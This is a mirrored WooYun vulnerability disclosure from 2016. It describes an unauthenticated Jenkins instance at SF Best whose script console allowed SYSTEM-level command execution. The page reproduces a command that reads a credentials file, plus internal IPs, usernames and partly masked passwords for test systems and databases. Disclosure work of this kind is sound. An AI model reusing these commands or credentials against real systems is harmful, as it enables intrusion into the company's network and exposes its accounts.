顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

admin 2017年4月25日13:17:29评论289 views字数 261阅读0分52秒阅读模式
摘要

2016-03-04: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-04-03: 细节向实习白帽子公开
2016-04-18: 细节向公众公开

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2016-180875

漏洞标题: 顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

相关厂商: 顺丰优选

漏洞作者: j14n

提交时间: 2016-03-04 17:20

公开时间: 2016-04-18 17:50

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 敏感接口未加权限认证 安全意识不足 安全意识不足

0人收藏


漏洞详情

披露状态:

2016-03-04: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-04-03: 细节向实习白帽子公开
2016-04-18: 细节向公众公开

简要描述:

rt

详细说明:

code 区域
http://114.251.157.7/

先证明这个地址是顺丰优选的,

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

jenkins 未授权访问

code 区域
http://114.251.157.7:8080/

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

项目源码

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

命令执行

code 区域
http://114.251.157.7:8080/script
code 区域
cmd /c type d://跑测账号.txt

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

D:

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

E:

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

这些就不进去一一截图了

nt authority/system权限

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

内网

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

最后发一下 t环境

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

code 区域
绑定host后, 新监控平台访问地址:
http://10.102.36.157:8080/ServiceManagement/logout.do
(用户名 admi手工大码per 密码:123456789)

远程访问IDC测试环境服务器(CRT创建新连接):
10.102.36.171 www.t.com
10.102.36.161 scm.t.com
10.102.36.162 win.t.com
10.102.36.154 fms.t.com (财务系统)
端口号均为:9880 用户均为: ng手工大码x 密码均为: 1q手工大码4r

各位,
目前,IDC新测试环境各系统功能已经基本测试通过,
现,告知IDC测试环境访问方式。
1、 host绑定:
10.102.36.171 www.t.com
10.102.36.171 passport.t.com
10.102.36.171 home.t.com
10.102.36.171 cart.t.com
10.102.36.171 i.t.com
10.102.36.171 corp.t.com
10.102.36.171 supplier.t.com
10.102.36.170 search.t.com

10.102.36.160 uas.t.com
10.102.36.161 scm.t.com
10.102.36.162 win.t.com
10.102.36.157 ServiceManagement (监控平台)
10.102.36.154 fms.t.com
10.102.36.171 channel.t.com
绑定host后,可通过原域名正常访问新测试环境。

2、 数据库:
新后台库:
用户名:sf_de手工大码st
密码:luxwH3手工大码tG
项目名称:测试组
数据库IP:10.102.36.132 域名:IDC-T-sfbest

新前台库:
用户名:sf_dev_test
密码:L5U手工大码Sk7b
项目名称:测试组
数据库IP:10.102.36.135 域名:IDC-T-WebOrder


新LSCM地址:http://lscm.st.sf-express.com:8080/lscm/loginmgmt/frame.action
用户:315572 密码:ac手工大码.123

wms远程链接:10.0.44.98
账号及密码:6805手工大码0506

目前仓储那边搭建了一个新的测试环境,地址与账户密码如下:
远程连接IP:10.202.34.159
用户名:315572/317750
密码:
ps:以前申请的其他账号,请用以上密码登录。

lscm下发地址:http://lscm-cms.sit.sf-express.com/cms/newloginmgmt/navigation.action
账户:234手工大码53
密码:ac手工大码.123

漏洞证明:

code 区域
http://114.251.157.7/

先证明这个地址是顺丰优选的,

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

jenkins 未授权访问

code 区域
http://114.251.157.7:8080/

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

项目源码

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

命令执行

code 区域
http://114.251.157.7:8080/script
code 区域
cmd /c type d://跑测账号.txt

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

D:

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

E:

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

这些就不进去一一截图了

nt authority/system权限

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

内网

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

最后发一下 t环境

顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

code 区域
绑定host后, 新监控平台访问地址:
http://10.102.36.157:8080/ServiceManagement/logout.do
(用户名 admi手工大码per 密码:123456789)

远程访问IDC测试环境服务器(CRT创建新连接):
10.102.36.171 www.t.com
10.102.36.161 scm.t.com
10.102.36.162 win.t.com
10.102.36.154 fms.t.com (财务系统)
端口号均为:9880 用户均为: ng手工大码x 密码均为: 1q手工大码4r

各位,
目前,IDC新测试环境各系统功能已经基本测试通过,
现,告知IDC测试环境访问方式。
1、 host绑定:
10.102.36.171 www.t.com
10.102.36.171 passport.t.com
10.102.36.171 home.t.com
10.102.36.171 cart.t.com
10.102.36.171 i.t.com
10.102.36.171 corp.t.com
10.102.36.171 supplier.t.com
10.102.36.170 search.t.com

10.102.36.160 uas.t.com
10.102.36.161 scm.t.com
10.102.36.162 win.t.com
10.102.36.157 ServiceManagement (监控平台)
10.102.36.154 fms.t.com
10.102.36.171 channel.t.com
绑定host后,可通过原域名正常访问新测试环境。

2、 数据库:
新后台库:
用户名:sf_de手工大码st
密码:luxwH3手工大码tG
项目名称:测试组
数据库IP:10.102.36.132 域名:IDC-T-sfbest

新前台库:
用户名:sf_dev_test
密码:L5U手工大码Sk7b
项目名称:测试组
数据库IP:10.102.36.135 域名:IDC-T-WebOrder


新LSCM地址:http://lscm.st.sf-express.com:8080/lscm/loginmgmt/frame.action
用户:315572 密码:ac手工大码.123

wms远程链接:10.0.44.98
账号及密码:6805手工大码0506

目前仓储那边搭建了一个新的测试环境,地址与账户密码如下:
远程连接IP:10.202.34.159
用户名:315572/317750
密码:
ps:以前申请的其他账号,请用以上密码登录。

lscm下发地址:http://lscm-cms.sit.sf-express.com/cms/newloginmgmt/navigation.action
账户:234手工大码53
密码:ac手工大码.123

修复方案:

不安全的Jenkins允许网络上的任何人以你的身份访问程序。考虑至少启用身份验证来阻止滥用。

版权声明:转载请注明来源 j14n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-03-04 17:50

厂商回复:

感谢提交,在紧急处理中。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-04 17:22 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    666

  2. 2016-03-04 17:22 | 独臂刀王 ( 普通白帽子 | Rank:393 漏洞数:103 | 提交一个漏洞就可以买个柚子~~好爽~)

    1

    可以的表弟

  3. 2016-03-04 17:26 | j14n ( 普通白帽子 | Rank:2226 漏洞数:398 )

    1

    @独臂刀王 键盘明天到。。顺丰给转到别地了。。

  4. 2016-03-07 17:15 | 顺丰优选(乌云厂商)

    1

    @j14n 请提供一下你的联系方式。我们准备给予奖励……

  5. 2016-03-11 17:36 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    jenkins?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin